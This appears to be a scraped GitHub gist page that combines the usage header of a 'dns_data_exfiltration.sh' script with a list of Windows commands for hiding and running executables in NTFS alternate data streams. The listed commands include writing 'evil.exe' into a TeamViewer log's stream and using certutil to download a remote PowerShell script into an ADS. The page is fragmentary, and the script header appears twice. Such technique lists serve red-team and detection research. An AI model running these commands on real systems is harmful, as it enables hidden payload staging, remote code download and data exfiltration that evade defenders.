Soroush Dalili irsdl

## dns_data_exfiltration.sh
#!/bin/bash

: '
Usage:
./dns_data_exfiltration.sh "ls -lh" #the output of "ls -lh" will be exfiltrated over dns

Todo:
1. add support for powershell
something like the following should do the trick but haven't tested it:
outer_cmd_template="powershell -enc %CMD_B64%"

## Exe_ADS_Methods.md

      
        
          
            
              
              1 file
            
          
          
            
              
              77 forks
            
          
          
            
              
              11 comments
            
          
          
            
              
              208 stars
            
          
        
        
          
              
          
          
            
                api0cradle
                / Exe_ADS_Methods.md
            
            
              Last active
              April 21, 2024 17:37
            
              
                Execute from Alternate Streams
              
          
        
      
        
  
      
    Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
	#!/bin/bash

	: '
	Usage:
	./dns_data_exfiltration.sh "ls -lh" #the output of "ls -lh" will be exfiltrated over dns

	Todo:
	1. add support for powershell
	something like the following should do the trick but haven't tested it:
	outer_cmd_template="powershell -enc %CMD_B64%"